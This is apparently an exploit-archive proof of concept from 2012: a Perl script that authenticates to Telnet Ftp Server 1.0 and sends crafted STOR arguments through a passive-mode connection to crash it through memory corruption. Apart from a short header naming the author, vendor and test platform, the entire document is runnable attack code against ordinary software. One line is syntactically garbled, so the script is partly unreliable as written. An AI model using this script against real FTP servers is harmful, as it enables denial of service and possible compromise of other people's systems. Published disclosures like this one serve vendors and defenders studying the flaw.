# Exploit Title: Telnet Ftp Server <= Memory Corruption PoC # crash:http://img40.imageshack.us/img40/595/ftpqm.jpg # Date: July 7, 2012 # Author: coolkaveh # coolkaveh () rocketmail com # https://twitter.com/coolkaveh # Vendor Homepage: http://www.slimbyte.sufx.net/ # also download link available at : http://telnet-ftp-server.en.softonic.com/ # Version: 1.0 build(1.218) # Tested on: windows 7 SP1 #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Crappy Telnet Ftp Server Memory Corruption PoC #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/usr/bin/perl -w use IO::Socket; use Thread; $|=1; $host=shift; $port=shift || "21"; if(!defined($host)){ print("usage: $0 \$host [\$port]\n"); exit(0); } $check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60); if(defined $check_first){ print "$host -> $port is alive.\n"; $check_first->close; }else{ die("$host -> $port is closed!\n"); } @bf1=( 'A'x5, ); @bf2=( '!)!)', ); @bf3=( '0', ); @t= () bf1; push(@t, @bf2); push(@t, @bf3); sub check(){ #Thread->self->detach; $sock=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60); if(defined $sock){ #print "$host -> $port is alive.\n"; undef($content_tmp); $sock->recv($content_tmp,100,0); if(length($content_tmp)>0){ $sock->close; return 1; }else{ $sock->close; return 0; } }else{ #print("$host -> $port is closed!\n"); return 0; } } #set PASV Mode send Socket sub send_sock($){ $send_port_num=shift; Thread->self->detach; $send_sock_tmp=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$send_port_num, Proto=>'tcp', Timeout=>30); if(defined($send_sock_tmp)){ $send_sock_tmp->recv($mem,100,0); print "$mem\n"; $mem=0; $send_sock_tmp->close; undef($send_port_num); return 1; }else{ undef($send_port_num); return 0; } } print "Please enter the real username: "; $real_username=<STDIN>; chop($real_username); print "Please enter the real password: "; $real_password=<STDIN>; chop($real_password); @cm=( 'STOR', 'STOR', ); $sock3=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30); if(defined($sock3)){ $sock3->recv($content, 100, 0); print "$content\n"; sleep(2); $sock3->send("USER "."$real_username\r\n", 0); sleep(2); $sock3->recv($content, 100, 0); print "$content\n"; sleep(2); $sock3->send("PASS "."$real_password\r\n", 0); sleep(2); $sock3->recv($content, 100, 0); print "$content\n"; sleep(2); if($content=~m/^230/){ $sock3->close; }else{ $sock3->close; die("Username or Password is wrong!\n"); } }else{ die "$host -> $port is closed!\n"; } L_V_J: undef($cmd); C_L: foreach $cmd (@cm){ foreach $poc (@t){ LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30); if(defined($sock4)){ $sock4->recv($content, 100, 0); print "$content\n"; sleep(2); $sock4->send("USER "."$real_username\r\n", 0); sleep(2); $sock4->recv($content, 100, 0); print "$content\n"; sleep(2); $sock4->send("PASS "."$real_password\r\n", 0); sleep(2); $sock4->recv($content, 100, 0); print "$content\n"; sleep(2); if(($cmd eq 'STOR')){ $sock4->send("PASV\r\n", 0); sleep(2); $sock4->recv($content, 100, 0); print "$content\n"; sleep(2); if($content=~m/\((.*),(.*),(.*),(.*),(.*),(.*)\)/){ $send_port=$5*256+$6; } } } $sock4->send("$cmd"." "."$poc\r\n", 0); Thread->new(\&send_sock,$send_port); $sock4->send("$cmd"." "."$poc\r\n", 0); sleep(2); $sock4->recv($content, 100, 0); $thread3=Thread->new(\&check); undef($thread3); $sock4->send("QUIT\r\n", 0); } }